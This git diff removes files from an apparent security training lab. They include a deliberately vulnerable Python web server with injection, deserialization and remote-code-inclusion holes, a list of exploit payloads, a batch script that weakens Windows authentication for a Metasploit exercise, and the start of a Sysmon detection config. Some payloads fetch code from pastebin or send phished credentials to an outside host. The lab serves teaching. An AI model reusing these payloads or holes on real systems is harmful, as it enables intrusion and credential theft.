-USERS_XML = """<?xml version="1.0" encoding="utf-8"?><users><user id="0"><username>admin</username><name>admin</name><surname>admin</surname><password>7en8aiDoh!</password></user><user id="1"><username>dricci</username><name>dian</name><surname>ricci</surname><password>12345</password></user><user id="2"><username>amason</username><name>anthony</name><surname>mason</surname><password>gandalf</password></user><user id="3"><username>svargas</username><name>sandra</name><surname>vargas</surname><password>phest1945</password></user></users>"""
-CASES = (("Blind SQL Injection (<i>boolean</i>)", "?id=2", "/?id=2%20AND%20SUBSTR((SELECT%20password%20FROM%20users%20WHERE%20name%3D%27admin%27)%2C1%2C1)%3D%277%27\" onclick=\"alert('checking if the first character for admin\\'s password is digit \\'7\\' (true in case of same result(s) as for \\'vulnerable\\')')", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#boolean-exploitation-technique"), ("Blind SQL Injection (<i>time</i>)", "?id=2", "/?id=(SELECT%20(CASE%20WHEN%20(SUBSTR((SELECT%20password%20FROM%20users%20WHERE%20name%3D%27admin%27)%2C2%2C1)%3D%27e%27)%20THEN%20(LIKE(%27ABCDEFG%27%2CUPPER(HEX(RANDOMBLOB(300000000)))))%20ELSE%200%20END))\" onclick=\"alert('checking if the second character for admin\\'s password is letter \\'e\\' (true in case of delayed response)')", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#time-delay-exploitation-technique"), ("UNION SQL Injection", "?id=2", "/?id=2%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20(SELECT%20id%7C%7C%27%2C%27%7C%7Cusername%7C%7C%27%2C%27%7C%7Cpassword%20FROM%20users%20WHERE%20username%3D%27admin%27)", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#union-exploitation-technique"), ("Login Bypass", "/login?username=&amp;password=", "/login?username=admin&amp;password=%27%20OR%20%271%27%20LIKE%20%271", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#classic-sql-injection"), ("HTTP Parameter Pollution", "/login?username=&amp;password=", "/login?username=admin&amp;password=%27%2F*&amp;password=*%2FOR%2F*&amp;password=*%2F%271%27%2F*&amp;password=*%2FLIKE%2F*&amp;password=*%2F%271", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution"), ("Cross Site Scripting (<i>reflected</i>)", "/?v=0.2", "/?v=0.2%3Cscript%3Ealert(%22arbitrary%20javascript%22)%3C%2Fscript%3E", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting"), ("Cross Site Scripting (<i>stored</i>)", "/?comment=\" onclick=\"document.location='/?comment='+prompt('please leave a comment'); return false", "/?comment=%3Cscript%3Ealert(%22arbitrary%20javascript%22)%3C%2Fscript%3E", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting"), ("Cross Site Scripting (<i>DOM</i>)", "/?#lang=en", "/?foobar#lang=en%3Cscript%3Ealert(%22arbitrary%20javascript%22)%3C%2Fscript%3E", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting"), ("Cross Site Scripting (<i>JSONP</i>)", "/users.json?callback=process\" onclick=\"var script=document.createElement('script');script.src='/users.json?callback=process';document.getElementsByTagName('head')[0].appendChild(script);return false", "/users.json?callback=alert(%22arbitrary%20javascript%22)%3Bprocess\" onclick=\"var script=document.createElement('script');script.src='/users.json?callback=alert(%22arbitrary%20javascript%22)%3Bprocess';document.getElementsByTagName('head')[0].appendChild(script);return false", "http://www.metaltoad.com/blog/using-jsonp-safely"), ("XML External Entity (<i>local</i>)", "/?xml=%3Croot%3E%3C%2Froot%3E", "/?xml=%3C!DOCTYPE%20example%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E" if os.name != "nt" else "/?xml=%3C!DOCTYPE%20example%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2FC%3A%2FWindows%2Fwin.ini%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection"), ("XML External Entity (<i>remote</i>)", "/?xml=%3Croot%3E%3C%2Froot%3E", "/?xml=%3C!DOCTYPE%20example%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22http%3A%2F%2Fpastebin.com%2Fraw.php%3Fi%3Dh1rvVnvx%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection"), ("Server Side Request Forgery", "/?path=", "/?path=http%3A%2F%2F127.0.0.1%3A631" if os.name != "nt" else "/?path=%5C%5C127.0.0.1%5CC%24%5CWindows%5Cwin.ini", "http://www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/"), ("Blind XPath Injection (<i>boolean</i>)", "/?name=dian", "/?name=admin%27%20and%20substring(password%2Ftext()%2C3%2C1)%3D%27n\" onclick=\"alert('checking if the third character for admin\\'s password is letter \\'n\\' (true in case of found item)')", "https://owasp.org/www-community/attacks/XPATH_Injection"), ("Cross Site Request Forgery", "/?comment=", "/?v=%3Cimg%20src%3D%22%2F%3Fcomment%3D%253Cdiv%2520style%253D%2522color%253Ared%253B%2520font-weight%253A%2520bold%2522%253EI%2520quit%2520the%2520job%253C%252Fdiv%253E%22%3E\" onclick=\"alert('please visit \\'vulnerable\\' page to see what this click has caused')", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery"), ("Frame Injection (<i>phishing</i>)", "/?v=0.2", "/?v=0.2%3Ciframe%20src%3D%22http%3A%2F%2Fdsvw.c1.biz%2Fi%2Flogin.html%22%20style%3D%22background-color%3Awhite%3Bz-index%3A10%3Btop%3A10%25%3Bleft%3A10%25%3Bposition%3Afixed%3Bborder-collapse%3Acollapse%3Bborder%3A1px%20solid%20%23a8a8a8%22%3E%3C%2Fiframe%3E", "http://www.gnucitizen.org/blog/frame-injection-fun/"), ("Frame Injection (<i>content spoofing</i>)", "/?v=0.2", "/?v=0.2%3Ciframe%20src%3D%22http%3A%2F%2Fdsvw.c1.biz%2F%22%20style%3D%22background-color%3Awhite%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A10%3Btop%3A0%3Bleft%3A0%3Bposition%3Afixed%3B%22%20frameborder%3D%220%22%3E%3C%2Fiframe%3E", "http://www.gnucitizen.org/blog/frame-injection-fun/"), ("Clickjacking", None, "/?v=0.2%3Cdiv%20style%3D%22opacity%3A0%3Bfilter%3Aalpha(opacity%3D20)%3Bbackground-color%3A%23000%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A10%3Btop%3A0%3Bleft%3A0%3Bposition%3Afixed%3B%22%20onclick%3D%22document.location%3D%27http%3A%2F%2Fdsvw.c1.biz%2F%27%22%3E%3C%2Fdiv%3E%3Cscript%3Ealert(%22click%20anywhere%20on%20page%22)%3B%3C%2Fscript%3E", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking"), ("Unvalidated Redirect", "/?redir=", "/?redir=http%3A%2F%2Fdsvw.c1.biz", "https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html"), ("Arbitrary Code Execution", "/?domain=www.google.com", "/?domain=www.google.com%3B%20ifconfig" if os.name != "nt" else "/?domain=www.google.com%26%20ipconfig", "https://en.wikipedia.org/wiki/Arbitrary_code_execution"), ("Full Path Disclosure", "/?path=", "/?path=foobar", "https://owasp.org/www-community/attacks/Full_Path_Disclosure"), ("Source Code Disclosure", "/?path=", "/?path=dsvw.py", "https://www.imperva.com/resources/glossary?term=source_code_disclosure"), ("Path Traversal", "/?path=", "/?path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" if os.name != "nt" else "/?path=..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini", "https://www.owasp.org/index.php/Path_Traversal"), ("File Inclusion (<i>remote</i>)", "/?include=", "/?include=http%%3A%%2F%%2Fpastebin.com%%2Fraw.php%%3Fi%%3D6VyyNNhc&amp;cmd=%s" % ("ifconfig" if os.name != "nt" else "ipconfig"), "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion"), ("HTTP Header Injection (<i>phishing</i>)", "/?charset=utf8", "/?charset=utf8%0D%0AX-XSS-Protection:0%0D%0AContent-Length:388%0D%0A%0D%0A%3C!DOCTYPE%20html%3E%3Chtml%3E%3Chead%3E%3Ctitle%3ELogin%3C%2Ftitle%3E%3C%2Fhead%3E%3Cbody%20style%3D%27font%3A%2012px%20monospace%27%3E%3Cform%20action%3D%22http%3A%2F%2Fdsvw.c1.biz%2Fi%2Flog.php%22%20onSubmit%3D%22alert(%27visit%20%5C%27http%3A%2F%2Fdsvw.c1.biz%2Fi%2Flog.txt%5C%27%20to%20see%20your%20phished%20credentials%27)%22%3EUsername%3A%3Cbr%3E%3Cinput%20type%3D%22text%22%20name%3D%22username%22%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput%20type%3D%22password%22%20name%3D%22password%22%3E%3Cinput%20type%3D%22submit%22%20value%3D%22Login%22%3E%3C%2Fform%3E%3C%2Fbody%3E%3C%2Fhtml%3E", "https://www.rapid7.com/db/vulnerabilities/http-generic-script-header-injection"), ("Component with Known Vulnerability (<i>pickle</i>)", "/?object=%s" % urllib.parse.quote(pickle.dumps(dict((_.findtext("username"), (_.findtext("name"), _.findtext("surname"))) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))), "/?object=cos%%0Asystem%%0A(S%%27%s%%27%%0AtR.%%0A\" onclick=\"alert('checking if arbitrary code can be executed remotely (true in case of delayed response)')" % urllib.parse.quote("ping -c 5 127.0.0.1" if os.name != "nt" else "ping -n 5 127.0.0.1"), "https://www.cs.uic.edu/~s/musings/pickle.html"))
-
-def init():
-    global connection
-    http.server.HTTPServer.allow_reuse_address = True
-    connection = sqlite3.connect(":memory:", isolation_level=None, check_same_thread=False)
-    cursor = connection.cursor()
-    cursor.execute("CREATE TABLE users(id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, name TEXT, surname TEXT, password TEXT)")
-    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
-    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
-
-class ReqHandler(http.server.BaseHTTPRequestHandler):
-    def do_GET(self):
-        path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
-        code, content, params, cursor = http.client.OK, HTML_PREFIX, dict((match.group("parameter"), urllib.parse.unquote(','.join(re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
-        try:
-            if path == '/':
-                if "id" in params:
-                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
-                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
-                elif "v" in params:
-                    content += re.sub(r"(v<b>)[^<]+(</b>)", r"\g<1>%s\g<2>" % params["v"], HTML_POSTFIX)
-                elif "object" in params:
-                    content = str(pickle.loads(params["object"].encode()))
-                elif "path" in params:
-                    content = (open(os.path.abspath(params["path"]), "rb") if not "://" in params["path"] else urllib.request.urlopen(params["path"])).read().decode()
-                elif "domain" in params:
-                    content = subprocess.check_output("nslookup " + params["domain"], shell=True, stderr=subprocess.STDOUT, stdin=subprocess.PIPE).decode()
-                elif "xml" in params:
-                    content = lxml.etree.tostring(lxml.etree.parse(io.BytesIO(params["xml"].encode()), lxml.etree.XMLParser(no_network=False)), pretty_print=True).decode()
-                elif "name" in params:
-                    found = lxml.etree.parse(io.BytesIO(USERS_XML.encode())).xpath(".//user[name/text()='%s']" % params["name"])
-                    content += "<b>Surname:</b> %s%s" % (found[-1].find("surname").text if found else "-", HTML_POSTFIX)
-                elif "size" in params:
-                    start, _ = time.time(), "<br>".join("#" * int(params["size"]) for _ in range(int(params["size"])))
-                    content += "<b>Time required</b> (to 'resize image' to %dx%d): %.6f seconds%s" % (int(params["size"]), int(params["size"]), time.time() - start, HTML_POSTFIX)
-                elif "comment" in params or query == "comment=":
-                    if "comment" in params:
-                        cursor.execute("INSERT INTO comments VALUES(NULL, '%s', '%s')" % (params["comment"], time.ctime()))
-                        content += "Thank you for leaving the comment. Please click here <a href=\"/?comment=\">here</a> to see all comments%s" % HTML_POSTFIX
-                    else:
-                        cursor.execute("SELECT id, comment, time FROM comments")
-                        content += "<div><span>Comment(s):</span></div><table><thead><th>id</th><th>comment</th><th>time</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
-                elif "include" in params:
-                    backup, sys.stdout, program, envs = sys.stdout, io.StringIO(), (open(params["include"], "rb") if not "://" in params["include"] else urllib.request.urlopen(params["include"])).read(), {"DOCUMENT_ROOT": os.getcwd(), "HTTP_USER_AGENT": self.headers.get("User-Agent"), "REMOTE_ADDR": self.client_address[0], "REMOTE_PORT": self.client_address[1], "PATH": path, "QUERY_STRING": query}
-                    exec(program, envs)
-                    content += sys.stdout.getvalue()
-                    sys.stdout = backup
-                elif "redir" in params:
-                    content = content.replace("<head>", "<head><meta http-equiv=\"refresh\" content=\"0; url=%s\"/>" % params["redir"])
-                if HTML_PREFIX in content and HTML_POSTFIX not in content:
-                    content += "<div><span>Attacks:</span></div>\n<ul>%s\n</ul>\n" % ("".join("\n<li%s>%s - <a href=\"%s\">vulnerable</a>|<a href=\"%s\">exploit</a>|<a href=\"%s\" target=\"_blank\">info</a></li>" % (" class=\"disabled\" title=\"module 'python-lxml' not installed\"" if ("lxml.etree" not in sys.modules and any(_ in case[0].upper() for _ in ("XML", "XPATH"))) else "", case[0], case[1], case[2], case[3]) for case in CASES)).replace("<a href=\"None\">vulnerable</a>|", "<b>-</b>|")
-            elif path == "/users.json":
-                content = "%s%s%s" % ("" if not "callback" in params else "%s(" % params["callback"], json.dumps(dict((_.findtext("username"), _.findtext("surname")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user"))), "" if not "callback" in params else ")")
-            elif path == "/login":
-                cursor.execute("SELECT * FROM users WHERE username='" + re.sub(r"[^\w]", "", params.get("username", "")) + "' AND password='" + params.get("password", "") + "'")
-                content += "Welcome <b>%s</b><meta http-equiv=\"Set-Cookie\" content=\"SESSIONID=%s; path=/\"><meta http-equiv=\"refresh\" content=\"1; url=/\"/>" % (re.sub(r"[^\w]", "", params.get("username", "")), "".join(random.sample(string.ascii_letters + string.digits, 20))) if cursor.fetchall() else "The username and/or password is incorrect<meta http-equiv=\"Set-Cookie\" content=\"SESSIONID=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT\">"
-            else:
-                code = http.client.NOT_FOUND
-        except Exception as ex:
-            content = ex.output if isinstance(ex, subprocess.CalledProcessError) else traceback.format_exc()
-            code = http.client.INTERNAL_SERVER_ERROR
-        finally:
-            self.send_response(code)
-            self.send_header("Connection", "close")
-            self.send_header("X-XSS-Protection", "0")
-            self.send_header("Content-Type", "%s%s" % ("text/html" if content.startswith("<!DOCTYPE html>") else "text/plain", "; charset=%s" % params.get("charset", "utf8")))
-            self.end_headers()
-            self.wfile.write(("%s%s" % (content, HTML_POSTFIX if HTML_PREFIX in content and GITHUB not in content else "")).encode())
-            self.wfile.flush()
-
-class ThreadingServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
-    def server_bind(self):
-        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
-        http.server.HTTPServer.server_bind(self)
-
-if __name__ == "__main__":
-    init()
-    print("%s #v%s\n by: %s\n\n[i] running HTTP server at 'http://%s:%d'..." % (NAME, VERSION, AUTHOR, LISTEN_ADDRESS, LISTEN_PORT))
-    try:
-        ThreadingServer((LISTEN_ADDRESS, LISTEN_PORT), ReqHandler).serve_forever()
-    except KeyboardInterrupt:
-        pass
-    except Exception as ex:
-        print("[x] exception occurred ('%s')" % ex)
-    finally:
-        os._exit(0)
diff --git a/labupdate_pull.bat b/labupdate_pull.bat
deleted file mode 100644
index 649c2209..00000000
--- a/labupdate_pull.bat
+++ /dev/null
@@ -1,3 +0,0 @@
-@ECHO OFF
-git pull
-exit
\ No newline at end of file
diff --git a/nc.7z b/nc.7z
deleted file mode 100644
index 4bf4dfa0..00000000
Binary files a/nc.7z and /dev/null differ
diff --git a/netcommands.PNG b/netcommands.PNG
deleted file mode 100644
index 43746c94..00000000
Binary files a/netcommands.PNG and /dev/null differ
diff --git a/smb.bat b/smb.bat
deleted file mode 100644
index cd935614..00000000
--- a/smb.bat
+++ /dev/null
@@ -1,132 +0,0 @@
-@echo off
-
-
-echo 504msf_exercise.bat
-echo.
-echo This script will start the lanmanserver service if it is not already running, and change the value of the following registry keys:
-echo hklm\software\microsoft\windows\currentversion\policies\system\LocalAccountTokenFilterPolicy = 1
-echo hklm\system\currentcontrolset\control\lsa\ForceGuest = 0
-echo hklm\system\currentcontrolset\control\lsa\LmCompatibilityLevel = 0
-echo.
-echo This script will also create a script on your Desktop called 504msf_restore.bat that will restore each setting to its original value.
-echo.
-echo Is it okay to proceed?
-pause
-echo.
-
-
-REM Create beginning of restore script (if "." is passed, script will be created in current directory instead of Desktop)
-if [%1]==[.] (
-   set RESTOREFILE=.\504msf_restore.bat
-) else (
-   set RESTOREFILE=%USERPROFILE%\Desktop\504msf_restore.bat
-)
-if exist "%RESTOREFILE%" (
-  echo.
-  echo The 504msf_restore.bat file already exists.  Please run it and then delete it before running this script again so that you don't lose your original settings!
-  pause
-  exit /B 1
-)
-echo @echo off > "%RESTOREFILE%"
-echo at ^> nul >> "%RESTOREFILE%"
-echo if %%ERRORLEVEL%% NEQ 0 ( >> "%RESTOREFILE%"
-echo    echo Please run this script with elevated privileges! >> "%RESTOREFILE%"
-echo    pause >> "%RESTOREFILE%"
-echo    exit /B 1 >> "%RESTOREFILE%"
-echo ) >> "%RESTOREFILE%"
-echo echo 504msf_restore.bat >> "%RESTOREFILE%"
-echo echo. >> "%RESTOREFILE%"
-echo echo This script will revert the system settings changed by 504msf_exercise.bat back to their original settings on this system. >> "%RESTOREFILE%"
-echo echo. >> "%RESTOREFILE%"
-echo echo Is it okay to proceed? >> "%RESTOREFILE%"
-echo pause >> "%RESTOREFILE%"
-echo echo. >> "%RESTOREFILE%"
-
-
-REM Start the lanmanserver service if it isn't working
-sc query lanmanserver | findstr RUNNING >nul
-if %ERRORLEVEL% EQU 1 (
-   echo Running: sc start lanmanserver
-   sc start lanmanserver
-   echo.
-   echo echo Running: sc stop lanmanserver >> "%RESTOREFILE%"
-   echo sc stop lanmanserver >> "%RESTOREFILE%"
-   echo echo. >> "%RESTOREFILE%"
-)
-
-REM Global findstr command (used in all subsequent reg queries)
-set fnd=findstr /I /L /C:"REG_DWORD"
-
-REM TokenFilter check
-set qry=reg query "hklm\software\microsoft\windows\currentversion\policies\system" /v LocalAccountTokenFilterPolicy
-%qry% >nul 2>nul
-if %ERRORLEVEL% EQU 1 (set TOKENFILTER=DELME) else (
-for /f "Tokens=2*" %%a in ('%qry%^|%fnd%') do (
- @set TOKENFILTER=%%b
-)
-)
-echo Running: reg add hklm\software\microsoft\windows\currentversion\policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
-reg add hklm\software\microsoft\windows\currentversion\policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
-echo.
-if %TOKENFILTER%==DELME (
-   echo echo Running: reg delete hklm\software\microsoft\windows\currentversion\policies\system /v LocalAccountTokenFilterPolicy /f >> "%RESTOREFILE%"
-   echo reg delete hklm\software\microsoft\windows\currentversion\policies\system /v LocalAccountTokenFilterPolicy /f >> "%RESTOREFILE%"
-   echo echo. >> "%RESTOREFILE%"
-) else (
-   echo echo Running: reg add hklm\software\microsoft\windows\currentversion\policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d %TOKENFILTER% /f >> "%RESTOREFILE%"
-   echo reg add hklm\software\microsoft\windows\currentversion\policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d %TOKENFILTER% /f >> "%RESTOREFILE%"
-   echo echo. >> "%RESTOREFILE%"
-)
-
-
-REM ForceGuest check
-set qry=reg query "HKLM\System\CurrentControlSet\Control\Lsa" /v ForceGuest
-%qry% >nul 2>nul
-if %ERRORLEVEL% EQU 1 (set FORCEGUEST=DELME) else (
-for /f "Tokens=2*" %%a in ('%qry%^|%fnd%') do (
- @set FORCEGUEST=%%b
-)
-)
-echo Running: reg add hklm\system\currentcontrolset\control\lsa /v ForceGuest /t REG_DWORD /d 0 /f
-reg add hklm\system\currentcontrolset\control\lsa /v ForceGuest /t REG_DWORD /d 0 /f
-echo.
-if %FORCEGUEST%==DELME (
-   echo echo Running: reg delete hklm\system\currentcontrolset\control\lsa /v ForceGuest /f >> "%RESTOREFILE%"
-   echo reg delete hklm\system\currentcontrolset\control\lsa /v ForceGuest /f >> "%RESTOREFILE%"
-   echo echo. >> "%RESTOREFILE%"
-) else (
-   echo echo Running: reg add hklm\system\currentcontrolset\control\lsa /v ForceGuest /t REG_DWORD /d %FORCEGUEST% /f >> "%RESTOREFILE%"
-   echo reg add hklm\system\currentcontrolset\control\lsa /v ForceGuest /t REG_DWORD /d %FORCEGUEST% /f >> "%RESTOREFILE%"
-   echo echo. >> "%RESTOREFILE%"
-)
-
-
-REM LmCompatibilityLevel check
-set qry=reg query "HKLM\System\CurrentControlSet\Control\Lsa" /v LmCompatibilityLevel
-%qry% >nul 2>nul
-if %ERRORLEVEL% EQU 1 (set LMCOMPAT=DELME) else (
-for /f "Tokens=2*" %%a in ('%qry%^|%fnd%') do (
- @set LMCOMPAT=%%b
-)
-)
-echo Running: reg add hklm\system\currentcontrolset\control\lsa /v LmCompatibilityLevel /t REG_DWORD /d 0 /f
-reg add hklm\system\currentcontrolset\control\lsa /v LmCompatibilityLevel /t REG_DWORD /d 0 /f
-echo.
-if %LMCOMPAT%==DELME (
-   echo echo Running: reg delete hklm\system\currentcontrolset\control\lsa /v LmCompatibilityLevel /f >> "%RESTOREFILE%"
-   echo reg delete hklm\system\currentcontrolset\control\lsa /v LmCompatibilityLevel /f >> "%RESTOREFILE%"
-   echo echo. >> "%RESTOREFILE%"
-) else (
-   echo echo Running: reg add hklm\system\currentcontrolset\control\lsa /v LmCompatibilityLevel /t REG_DWORD /d %LMCOMPAT% /f >> "%RESTOREFILE%"
-   echo reg add hklm\system\currentcontrolset\control\lsa /v LmCompatibilityLevel /t REG_DWORD /d %LMCOMPAT% /f >> "%RESTOREFILE%"
-   echo echo. >> "%RESTOREFILE%"
-)
-
-
-echo Finished!
-echo.
-pause
-
-echo echo Finished! >> "%RESTOREFILE%"
-echo echo. >> "%RESTOREFILE%"
-echo pause >> "%RESTOREFILE%"
\ No newline at end of file
diff --git a/sysmonconfig-export.xml b/sysmonconfig-export.xml
deleted file mode 100644
index f6688b3f..00000000
--- a/sysmonconfig-export.xml
+++ /dev/null
@@ -1,1072 +0,0 @@
-<!--
-  sysmon-config | A Sysmon configuration focused on default high-quality event tracing and easy customization by the community
-  Source version:	71 | Date: 2020-01-16
-  Source project:	https://github.com/SwiftOnSecurity/sysmon-config
-  Source license:	Creative Commons Attribution 4.0 | You may privatize, fork, edit, teach, publish, or deploy for commercial use - with attribution in the text.
-
-  Fork version:	<N/A>
-  Fork author:	<N/A>
-  Fork project:	<N/A>
-  Fork license:	<N/A>
-
-  REQUIRED: Sysmon version 10.0.4.1 or higher (due to changes in syntax and bug-fixes)
-	https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
-
-  NOTE: To collect Sysmon logs centrally for free, see https://aka.ms/WEF | Command to allow log access to the Network Service:
-	wevtutil.exe sl Microsoft-Windows-Sysmon/Operational /ca:O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)
-
-  NOTE: Do not let the size and complexity of this configuration discourage you from customizing it or building your own.
-	This configuration is based around known, high-signal event tracing, and thus appears complicated, but it is only very
-	detailed. Significant effort over years has been invested in front-loading as much filtering as possible onto the
-	client. This is to make analysis of intrusions possible by hand, and to try to surface anomalous activity as quickly
-	as possible to technicians armed only with Event Viewer. Its purpose is to democratize system monitoring for all organizations.
-
-  NOTE: Sysmon is NOT a whitelist solution or HIDS correlation engine, it is a computer change logging tool.
-	Do NOT ignore everything possible. Sysmon's purpose is providing context during a threat or problem investigation. Legitimate
-	processes are routinely used by threats - do not blindly exclude them. Additionally, be mindful of process-hollowing / imitation.
-
-  NOTE: By default this monitors DNS, which is extremely noisy. If you are starting out on your monitoring journey, just remove that section.
-	You can remove DNS events from Event Viewer screen by applying a 'Filter Current View' for event IDs of: -22
-	Additionally, if you want to monitor DNS, you should deploy client-side adblocking to reduce lookups. See the DNS section for info.
-
-  NOTE: This configuration is designed for PER-MACHINE installs of Chrome and OneDrive. That moves their binaries out of user-controlled folders.
-	Otherwise, attackers could imitate these common applications, and bypass your logging. Below are silent upgrades you can do, no user impact:
-	- https://docs.microsoft.com/en-us/onedrive/per-machine-installation
-	- https://cloud.google.com/chrome-enterprise/browser/download/
-	- As of 2019-08-25 there is no usermode version of Microsoft Teams.
-
-  NOTE: Sysmon is not hardened against an attacker with admin rights. Additionally, this configuration offers an attacker, willing
-	to study it, limited ways to evade some of the logging. If you are in a very high-threat environment, you should consider a broader,
-	log-most approach. However, in the vast majority of cases, an attacker will bumble through multiple behavioral traps which
-	this configuration monitors, especially in the first minutes. Even APT do not send their A-team unless they know you're hardened.
-	5% of the effort gets 95% of the results. APT rely on nobody watching because almost nobody does. Your effort makes the difference.
-
-  NOTE: If you encounter unexplainable event inclusion/exclusion, you may have a second Sysmon instance installed under a different exe filename.
-	To clear this, try downloading the latest version and uninstalling with -u force. If it hangs, kill the processes and run it again to cleanup.
-
-  TECHNICAL:
-  - Run sysmon.exe -? for a briefing on Sysmon configuration.
-  - Sysmon XML cannot use the AMPERSAND sign. Replace it with this: &amp;
-  - Sysmon 8+ can track which rule caused an event to be logged through the "RuleName" field.
-  - If you only specify exclude for a filtering subsection, everything in that subsection is logged by default.
-  - Some Sysmon monitoring abilities are not meant for widely deployed general-purpose use due to performance impact. Depends on environment.
-  - Duplicate or overlapping "Include" rules do not result in duplicate events being logged.
-  - All characters enclosed by XML tags are always interpreted literally. Sysmon does not support wildcards (*), alternate characters, or RegEx.
-  - In registry events, the value name is appended to the full key path with a "\" delimiter. Default key values are named "\(Default)"
-  - "Image" is a technical term for a compiled binary file like an EXE or DLL. Also, it can match just the filename, or entire path.
-  - "ProcessGuid" and "LoginGuid" are not random, they contain some embedded information. https://gist.github.com/mattifestation/0102042160c9a60b2b847378c0ef70b4
-
-  FILTERING: Filter conditions available for use are: is, is not, contains, excludes, begin with, end with, less than, more than, image
-  - The "image" filter is usable on any field. Same as "is" but can either match entire string, or only the text after last "\". Credit: @mattifestation
-
--->
-
-<Sysmon schemaversion="4.22">
-	<!--SYSMON META CONFIG-->
-	<HashAlgorithms>md5,sha256,IMPHASH</HashAlgorithms> <!-- Both MD5 and SHA256 are the industry-standard algorithms for identifying files -->
-	<CheckRevocation/> <!-- Check loaded drivers, log if their code-signing certificate has been revoked, in case malware stole one to sign a kernel driver -->
-
-	<!-- <ImageLoad/> --> <!-- Would manually force-on ImageLoad monitoring, even without configuration below. Included only documentation. -->
-	<!-- <ProcessAccessConfig/> --> <!-- Would manually force-on ProcessAccess monitoring, even without configuration below. Included only documentation. -->
-	<!-- <PipeMonitoringConfig/> --> <!-- Would manually force-on PipeCreated / PipeConnected events, even without configuration below. Included only documentation. -->
-
-	<EventFiltering>
-
-	<!--SYSMON EVENT ID 1 : PROCESS CREATION [ProcessCreate]-->
-		<!--COMMENT:	All processes launched will be logged, except for what matches a rule below. It's best to be as specific as possible,
-			to avoid user-mode executables imitating other process names to avoid logging, or if malware drops files in an existing directory.
-			Ultimately, you must weigh CPU time checking many detailed rules, against the risk of malware exploiting the blindness created.
-			Beware of Masquerading, where attackers imitate the names and paths of legitimate tools. Ideally, you'd use both file path and
-			code signatures to validate, but Sysmon does not support that. Look into AppLocker/WindowsDeviceGuard for whitelisting support. -->
-
